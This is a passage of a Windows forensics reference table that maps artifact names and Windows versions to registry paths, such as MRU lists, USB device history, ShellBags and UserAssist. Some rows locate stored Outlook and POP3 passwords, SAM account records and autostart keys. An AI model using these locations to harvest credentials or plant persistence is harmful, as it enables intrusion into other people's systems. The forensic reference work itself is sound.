Office PowerPoint Recent PPTs | - | NTUSER.DAT\Software\Microsoft\Office\ver#\Common\Open Find\Microsoft Office PowerPoint\Settings\Save As\File Name MRU
Office PowerPoint Trusted Documents MRU | - | NTUSER.DAT\Software\Microsoft\Office\\PowerPoint\Security\Trusted Documents\TrustRecords
Office PowerPoint Trusted Locations MRU | - | NTUSER.DAT\Software\Microsoft\Office\\PowerPoint\Security\Trusted Locations\Location#
Office Publisher MRU | - | NTUSER.DAT\Software\Microsoft\Office\\Publisher\File MRU
Office Publisher Recent Documents | - | NTUSER.DAT\Software\Microsoft\Office\\Common\Open Find\Microsoft Office Publisher\Settings\Save As\File Name MRU
Office Word Autosave (File Recovery) | - | NTUSER.DAT\Software\Microsoft\Office\\Word\Resiliency\Document Recovery\
Office Word MRU | - | NTUSER.DAT\Software\Microsoft\Office\\Word\File MRU
Office Word MRU Live Account | - | NTUSER.DAT\Software\Microsoft\Office\\Word\User MRU\LiveId_\File MRU
Office Word OneDrive Synch Roaming Identities | 10 | NTUSER.DAT\Software\Microsoft\Office\\Common\Roaming\Identities\Settings\1133\\ListItems\\
Office Word Place MRU | - | NTUSER.DAT\Software\Microsoft\Office\\Word\Place MRU
Office Word Place MRU Live Account | - | NTUSER.DAT\Software\Microsoft\Office\\Word\User MRU\LiveId_\Place MRU
Office Word Reading Locations | - | NTUSER.DAT\Software\Microsoft\Office\\Word\Reading Locations\Document#
Office Word Recent Docs | - | NTUSER.DAT\Software\Microsoft\Office\\Common\Open Find\Microsoft Office Word\Settings\Save As\File Name MRU
Office Word Trusted Documents MRU | - | NTUSER.DAT\Software\Microsoft\Office\\Word\Security\Trusted Documents
Office Word Trusted Locations MRU | - | NTUSER.DAT\Software\Microsoft\Office\14.0\Word\Security\Trusted Locations\Location#
Office Word User Info | - | NTUSER.DAT\Software\Microsoft\Office\\Common\UserInfo
OneDrive App Info | 10 | NTUSER.DAT\SOFTWARE\Microsoft\OneDrive
OneDrive User ID and Login URL | 10 | NTUSER.DAT\SOFTWARE\Microsoft\AuthCookies\Live\Default\CAW
OneDrive User ID Associated with User | 10 | NTUSER.DAT\SOFTWARE\Microsoft\IdentityCRL\UserExtendedProperties\ / cid
OneDrive User ID, Live ID | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Office\\Common\Identity\Identities\_LiveId
OneNote User Information | 10 | settings.dat\LocalState; HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Identities\_LiveId
Open/Save MRU | - | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
Open/Save MRU | 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU
Open/Save MRU | XP | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
Outlook 2007 Account Passwords | 7 | NTUSER.DAT\Software\Microsoft\Protected Storage System Provider\SID\Identification\INETCOMM Server Passwords
Outlook 2007 Recent Attachments | 7 | NTUSER.DAT\Software\Microsoft\Office\version\Common\Open Find\Microsoft Office Outlook\Settings\Save Attachment\File Name MRU
Outlook 2007 Temp File Location | 7 | NTUSER.DAT\Software\Microsoft\Office\version\Outlook\Security
Outlook Account Passwords | - | NTUSER.DAT\Software\Microsoft\Protected Storage System Provider\SID\Identification\INETCOMM Server Passwords
Outlook Accounts | XP | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager
Outlook Recent Attachments | - | NTUSER.DAT\Software\Microsoft\Office\version\Common\Open Find\Microsoft Office Outlook\Settings\Save Attachment\File Name MRU
Outlook Settings | XP | HKEY_USERS\(User_ID)\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\
Outlook Temporary Attachment Directory | - | NTUSER.DAT\Software\Microsoft\Office\version\Outlook\Security
Pagefile Control | XP 7 8 10 | SYSTEM\ControlSet###\Control\Session Manager\Memory Management
Pagefile Settings | 7 | SYSTEM\ControlSetXXX\Control\Session Manager\Memory Management
Paint MRU | 7 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List
Paint MRU List | XP 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List
PAP Device Interface | 7 8 10 | SYSTEM\ControlSet001\Control\DeviceClasses\{f33fdc04-d1ac-4e8e-9a30-19bbd4b108ae}
Partition Management Driver Service | XP 7 8 10 | SYSTEM\ControlSet001\services\partmgr\Enum
Password Face Enabled | 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\FaceLogon\
Password Fingerprint Enabled | 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\FingerprintLogon\
Password Hint | 7 | SAM\Domains\Account\Users\\F_Value\UserPasswordHint
Password Hint XP | XP | SOFTWARE\Microsoft\Windows\CurrentVersion\Hints\
Password Picture Gesture | 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\PicturePassword\ / bgPath
Password PIN Enabled | 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\PINLogonEnrollment\
Passwords Cached Logon Password Maximum | XP | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
PCI Bus Device Information | 7 | SYSTEM\ControlSet###\Enum\PCI
PCI Bus Device Information | XP 7 8 10 | SYSTEM\ControlSet###\Enum\PCI
PCI Enumeration | XP 7 8 10 | SYSTEM\ControlSet001\Enum\PCI\\
Photos App Associated User | 10 | settings.dat\LocalState\OD\
Place MRU | 10 | NTUSER\SOFTWARE\Microsoft\Office\15.0\Word\User MRU\LiveId#\Place MRU
POP3 Passwords | XP | NTUSER.DAT\Software\Microsoft\Internet Account Manager\Accounts\0000000#
Portable Operating System Drive | 8 10 | SYSTEM\ControlSet001\Control / PortableOperatingSystem
PowerPoint 2007 Autosave Info | 7 | NTUSER.DAT\Software\Microsoft\Office\12.0\PowerPoint\Resiliency\DocumentRecovery\
PowerPoint 2007 MRU | 7 | NTUSER.DAT\Software\Microsoft\Office\12.0\PowerPoint\File MRU
Pre-Logon Access Provider | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\PLAP Providers\*
Pre-Logon Access Provider | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\PLAP Providers\*
Prefetch Information | 7 | SYSTEM\ControlSet###\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher
Printer Default | XP 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows NT\CurrentVersion\Windows\Devices
Printer Default | XP 7 8 10 | NTUSER.DAT\Printers\DevModesPerUser and DevModes#
Printer Information | 7 | SYSTEM\ControlSet###\Control\Print\Environments\Windows NT x86\Drivers\Version#
Printer Properties for Installed Printers | XP 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\
Product ID | 7 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId
Product Name | 7 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName
Profile List | XP 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
Program Compatibility Assistant (PCA) Archive for Apps | 8 | NTUSER.DAT\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
Program Compatibility Assistant (PCA) Tracking of User Launched Applications | 8 10 | NTUSER.DAT\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store
Program Compatibility Assistant Archive for Apps | 7 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
Publisher 2007 MRU | 7 | NTUSER.DAT\Software\Microsoft\Office\12.0\Publisher\Recent File List
Reading Locations | 10 | NTUSER\SOFTWARE\Microsoft\Office\15.0\Word\Reading Locations
ReadyBoost Attachments | 7 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\EMDMgmt\
ReadyBoost Attachments, USB Identification | 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\EMDMgmt\
ReadyBoost Driver | 8 10 | SYSTEM\ControlSet001\services\rdyboost\Enum
Recent Docs | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\
Recent Docs MRU / Recent Documents | XP 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\
Recent Documents | 7 | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
Recent Documents | - | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
RecentApps | 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps
RecentDocs | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
RecentDocs | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.iso
RecentDocs | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.vhd
RecentDocs for .jpg | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.jpg
Recycle Bin Info | 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\
Recycle Bin Info | 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\
Recycle Bin Info XP | XP | SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\
Safe Mode (devices, services and drivers enabled for Safe Mode) | - | HKLM\System\CurrentControlSet\Control\SafeBoot
Regedit - Favorites | XP 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit\Favorites
Regedit - Last Key Saved | XP 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit / LastKey
Regedit Last Key Saved | 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit\LastKey
[Link] search | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts / .com
Registered Applications | 7 8 10 | SOFTWARE\RegisteredApplications /
Registered Organization | 7 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization
Registered Owner | 7 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner
Registry Windows 7 32 Bit Shim Cache | 7 | HKLM\System\CurrentControlSet\Control\Session Manager\AppCompatCache\AppCompatCache
Registry Windows 7 List Mounted Devices | 7 | HKLM\System\MountedDevices\
Registry Windows 7 Network Adapter Configuration | 7 | HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\(interface-name)\
Registry Windows 7 Network List Profiles | 7 | HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{GUID}\
Registry Windows 7 List Applications Installed | 7 | HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\(Application Name)
Registry Windows 7 Security Audit Policies | 7 | HKLM\Security\Policy
Registry Windows 7 Time Zone Information | 7 | HKLM\System\CurrentControlSet\Control\TimeZoneInformation
Registry Windows 7 User Profile Logon | 7 | HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\{SID}\
Registry Windows 7 Winlogon Shell | 7 | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Remote Desktop | XP 7 8 10 | SYSTEM\ControlSet###\Control\Terminal Server / fDenyTSConnections
Remote Desktop Information | 7 | SYSTEM\ControlSet###\Control\Terminal Server\fDenyTSConnections
Roaming Identities (1125 PowerPoint, 1133 Word, 1141 Excel) | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Office\15.0\Common\Roaming\Identities\\
Run Box Recent Commands | 7 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Run MRU | XP 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Run Subkey - Active | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run / OneDrive
Run, Startup | XP 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run
Screen Saver Enabled | 7 | NTUSER.DAT\Control Panel\Desktop / ScreenSaveActive
Screen Saver Enabled | XP 7 8 10 | NTUSER.DAT\Control Panel\Desktop / ScreenSaveActive
Screen Saver Password Enabled | 7 | NTUSER.DAT\Control Panel\Desktop / ScreenSaverIsSecure
Screen Saver Secure Password Enabled | XP 7 8 10 | NTUSER.DAT\Control Panel\Desktop / ScreenSaverIsSecure
Screen Saver Timeout | 7 | NTUSER.DAT\Control Panel\Desktop / ScreenSaveTimeOut
Screen Saver Timeout | XP 7 8 10 | NTUSER.DAT\Control Panel\Desktop / ScreenSaveTimeOut
Screen Saver Wallpaper | 7 | NTUSER.DAT\Control Panel\Desktop / WallPaper
Screen Savers and Wallpaper | XP 7 8 10 | NTUSER.DAT\Control Panel\Desktop\
SCSI Device Information | 7 | SYSTEM\ControlSet###\Enum\SCSI
SCSI Device Information | XP 7 8 10 | SYSTEM\ControlSet###\Enum\SCSI
SCSI Enumeration | 7 8 10 | SYSTEM\ControlSet001\Enum\SCSI\\
Search Charm Entries for Internet Addresses and Sites | - | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchHistory\DefaultBrowser_NOPUBLISHERID!Microsoft.InternetExplorer.Default
Search WordWheelQuery | 7 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery
Serial Port Device Information | 7 | SYSTEM\ControlSet###\Enum\SERENUM
Services | XP 7 8 10 | SYSTEM\ControlSet###\Services
Services List | 7 | SYSTEM\ControlSet###\Services
Session Manager Execute | - | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager
Shared Data to: E-mail | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharingMFU
Shared Folders, Shared Printers | XP 7 8 10 | SYSTEM\ControlSet###\Services\LanmanServer\Shares /
Shared Photos | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharingMFU
Sharing MFU | 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\SharingMFU
Shell Bags | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Shell Bags | 7 8 10 | UsrClass.dat\Local Settings\Software\Microsoft\Windows\Shell\Bags
Shell Bags | 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags\1\Desktop
Shell Bags | - | UsrClass.dat\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Shell Execute Hooks | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\*
Shell Execute Hooks | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\*
Shell Extensions | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
Shell Extensions | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
Shell Extensions | - | HKEY_USERS\%SID%\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
Shell Extensions | - | HKEY_USERS\%SID%\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
Shell Load and Run | - | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
Shell Load and Run | - | HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows
ShellBags | XP | NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU
ShellBags | XP | NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags
ShellBags | XP | NTUSER.DAT\Software\Microsoft\Windows\ShellNoRoam\BagMRU
ShellBags | XP | NTUSER.DAT\Software\Microsoft\Windows\ShellNoRoam\Bags
Shim Cache | XP | HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatibility\AppCompatCache
Shimcache | XP | SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatibility
Shimcache | 7 8 10 | SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache
Shutdown Time | 7 | SYSTEM\ControlSetXXX\Control\Windows\ShutdownTime
Shutdown Time | XP 7 8 10 | SYSTEM\ControlSet###\Control\Windows / ShutdownTime
SkyDrive E-Mail Account Name | 8 | settings.dat\LocalState\Platform
SkyDrive User Name | 8 | settings.dat\RoamingState
Skype App Install | 10 | HKEY_CLASSES_ROOT\ActivatableClasses\Package\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c
Skype Assoc. Files 1 | 10 | HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-skype
Skype Assoc. Files 2 | 10 | HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.skype
Skype Assoc. Files 3 | 10 | HKEY_CURRENT_USER\SOFTWARE\Classes\.skype
Skype Assoc. Files 4 | 10 | HKEY_CLASSES_ROOT\.skype
Skype Cached IP Data | - | HKEY_CURRENT_USER\Software\SKYPE\PHONE\LIB\Connection\HOSTCACHE
Skype Install Path | 10 | HKEY_CURRENT_USER\SOFTWARE\Skype\Phone
Skype Installation | 10 | HKEY_CLASSES_ROOT\AppX(Random Value)
Skype Language | 10 | HKEY_CURRENT_USER\SOFTWARE\Skype\Phone\UI\General
Skype Process Name | 10 | HKEY_LOCAL_MACHINE\SOFTWARE\IM Providers\Skype
Skype Update App ID | 10 | HKEY_CLASSES_ROOT\AppID\{27E6D007-EE3B-4FF7-8AE8-28EF0739124C}
Skype User CID | 8 | settings.dat\LocalState / [Link]
Skype User List | 10 | HKEY_CURRENT_USER\SOFTWARE\Skype\Phone\Users\
Skype User Name E-Mail | - | settings.dat\LocalState / [Link]
Skype Version 1 | 10 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\(UID)\(UID)
Skype Version 2 | 10 | HKEY_CLASSES_ROOT\Installer\Products\74A569CF9384AC046B81814F680F246C
SRUM | - | SOFTWARE\Microsoft\Windows NT\CurrentVersion\SRUM\Extensions ({d10ca2fe-6fcf-4f6d-848e-b2e99266fa89} = Application Resource Usage Provider); C:\Windows\System32\SRU\
SRUM Resource Usage History | 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\SRUM\Extensions
Start and File Explorer Searches Entered by User | 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery
Start Menu Program List | - | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Programs\
Start Searches Entered by User | 7 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery
Start Searches Entered by User | - | NTUSER.DAT\Software\Microsoft\SearchAssistant\ACMru\5###
Startup Location | XP 7 8 10 | SOFTWARE\Microsoft\Command Processor / AutoRun
Startup Location | XP 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon / Userinit
Startup Location | XP 7 8 10 | SYSTEM\ControlSet###\Control\Session Manager\BootExecute
Startup Software | XP 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce
Startup Software Run | XP 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Startup Software Run Once | XP 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Storage Class Drivers | XP 7 8 10 | SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Storage Device Information | XP 7 8 10 | SYSTEM\ControlSet###\Enum\STORAGE
STORAGE Enumeration | XP 7 8 10 | SYSTEM\ControlSet001\Enum\STORAGE\Volume\\
Storage Spaces Drive ID | 8 10 | SYSTEM\ControlSet###\Services\spaceport\Parameters
System Restore Info | XP 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
System Restore Information | 7 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
TaskBar Application List | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Taskband / FavoritesResolve
TCPIP Data, Domain Names, Internet Connection Info | XP 7 8 10 | SYSTEM\ControlSet###\Services\Tcpip\Parameters\Interfaces\
TCPIP Network Cards | XP 7 8 10 | SYSTEM\ControlSet###\Services\Tcpip\Parameters\Interfaces\
TechSmith SnagIt MRU | - | NTUSER.DAT\Software\TechSmith\SnagIt\\Recent Captures
Theme Current Theme | XP 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Themes / CurrentTheme
Theme Last Theme | - | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Themes\Last Theme
Time Sync with Internet Servers | 7 | SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\Servers
Time Sync with Internet Choices | XP 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\Servers
Time Sync with Internet Enabled | XP 7 8 10 | SYSTEM\ControlSet###\Services\W32Time\Parameters / Type
Time Sync with Internet Servers | XP 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\Servers
Time Zone Information | XP 7 8 10 | SYSTEM\ControlSet###\Control\TimeZoneInformation
Trusted Documents | 10 | NTUSER\SOFTWARE\Microsoft\Office\15.0\Word\Security\Trusted Documents\TrustRecords
Trusted Locations | 10 | NTUSER\SOFTWARE\Microsoft\Office\15.0\Word\Security\Trusted Locations
Turn off UAC Behavior | 7 | SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
Turn off UAC Behavior | 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System / ConsentPromptBehaviorAdmin
Typed Paths in Windows Explorer | 7 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths
Typed Paths into Windows Explorer or File Explorer | 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths
TypedURLs | 10 | NTUSER.DAT\SOFTWARE\LocalSettings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs
TypedURLs | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
TypedURLs Hyperlink | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
TypedURLsTime | 10 | NTUSER.DAT\SOFTWARE\LocalSettings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs
TypedURLsTime | 10 | NTUSER.DAT\SOFTWARE\Microsoft\Internet Explorer\TypedURLsTime
TypedURLsVisitCount | 10 | NTUSER.DAT\SOFTWARE\LocalSettings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLsVisitCount
UAC On or Off | - | SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
UAC On or Off | 7 8 10 | SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System / EnableLUA
UMB Bus Driver Interface | 7 8 10 | SYSTEM\ControlSet001\Control\DeviceClasses\{65a9a6cf-64cd-480b-843e-32c86e1ba19f}
USB Device Classes | XP 7 8 10 | SYSTEM\ControlSet###\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\ / DeviceInstance
USB Device Containers | 8 10 | SYSTEM\ControlSet###\Control\DeviceContainers\\BaseContainers\
USB Device Information Values | 7 8 10 | SYSTEM\ControlSet001\Enum\USB\\
USB Device Interface | XP 7 8 10 | SYSTEM\ControlSet001\Control\DeviceClasses\{a5dcbf10-6530-11d2-901f-00c04fb951ed}
USB Enumeration | XP 7 8 10 | SYSTEM\ControlSet001\Enum\USB
USB First Install Date | 7 8 10 | SYSTEM\ControlSet###\Enum\USBSTOR\\\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000064\00000000 / Data
USB Install Date | 7 8 10 | SYSTEM\ControlSet###\Enum\USBSTOR\\\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 / Data
USB Last Arrival Date | 8 10 | SYSTEM\ControlSet###\Enum\USBSTOR\\\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066
USB Last Removal Date | 8 10 | SYSTEM\ControlSet###\Enum\USBSTOR\\\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067
USB Logged On User at Time of Access | XP 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\
USB ROM Descriptors | - | HKEY_LOCAL_MACHINE\USBSTOR\
USB to Volume Serial Number | 7 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\EMDMgmt
USB Windows Portable Devices | 7 8 10 | SOFTWARE\Microsoft\Windows Portable Devices\Devices
USBPRINT | XP 7 8 10 | SYSTEM\ControlSet001\Enum\USBPRINT\\
USB Hub Information | XP 7 8 10 | SYSTEM\ControlSet001\services\usbhub\Enum
USBSTOR Container ID | 7 8 10 | SYSTEM\ControlSet###\Enum\USBSTOR\\ / ContainerID
USBSTOR Drive Identification | XP 7 8 10 | SYSTEM\ControlSet###\Enum\USBSTOR\\
USBSTOR Enumeration | XP 7 8 10 | SYSTEM\ControlSet###\Enum\USBSTOR\\
USBSTOR Parent ID Prefix (PIP) | - | SYSTEM\ControlSet###\Enum\USBSTOR\\ / ParentIdPrefix
User Account Expiration | 7 | SAM\Domains\Account\Users\F Key
User Account Status | XP 7 8 10 | SAM\SAM\Domains\Account\Users\ / V
User Information F Value | XP 7 8 10 | SAM\SAM\Domains\Account\Users\ / F
User Information V Value | XP 7 8 10 | SAM\SAM\Domains\Account\Users\ / V
User Information Values | XP 7 8 10 | SAM\SAM\Domains\Account\Users\
User Live Accounts | 8 10 | SAM\SAM\Domains\Account\Users\ / F
User Logon Account Hidden on Startup | 7 8 10 | SAM\SAM\Domains\Account\Users\ / UserDontShowInLogonUI
User Logon Account Hidden on Startup | 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /
User Mode Bus Enumerator | Vista 7 8 10 | SYSTEM\ControlSet001\services\umbus\Enum
User Name and SID | XP 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\
User Password Hint | Vista 8 10 | SAM\SAM\Domains\Account\Users\ / UserPasswordHint
User Password Hint XP | XP | SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\
UserAssist | XP | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\
UserAssist | 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\
UserAssist | - | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count
UsrClass Info | - | HKEY_USERS\_Classes
VMware Player Recents List | - | NTUSER.DAT\Software\VMware, Inc.\VMware Player\VMplayer\Window position
Volume Device Interface Class | XP 7 8 10 | HKLM\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Volume Shadow Copy Service Driver | XP 7 8 10 | SYSTEM\ControlSet001\services\volsnap\Enum
Vuze Install Path 1 | 7 | HKEY_USERS\(SID)\Software\Azureus
Vuze Install Path 2 | 7 | HKEY_LOCAL_MACHINE\SOFTWARE\Azureus
Vuze Install4j | 7 | HKEY_LOCAL_MACHINE\SOFTWARE\ej-technologies\install4j\installations\allinstdirs8461-7759-5462-8226
Vuze install4j Program | 7 | HKEY_USERS\(SID)\Software\ej-technologies\exe4j\pids
Vuze Installer | 7 | HKEY_LOCAL_MACHINE\SOFTWARE\ej-technologies\install4j\installations\instdir8461-7759-5462-8226
Windows Explorer Settings | 7 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Windows Explorer Settings | XP 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Windows Portable Devices | 7 8 10 | SOFTWARE\Microsoft\Windows Portable Devices\Devices\
WindowsBootVerificationProgram | - | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\BootVerificationProgram
WindowsRunKeys | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\*
WindowsRunKeys | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\*
WindowsRunKeys | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\*
WindowsRunKeys | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\*
WindowsRunKeys | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx\*
WindowsRunKeys | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\*
WindowsRunKeys | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\*
WindowsRunKeys | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Setup\*
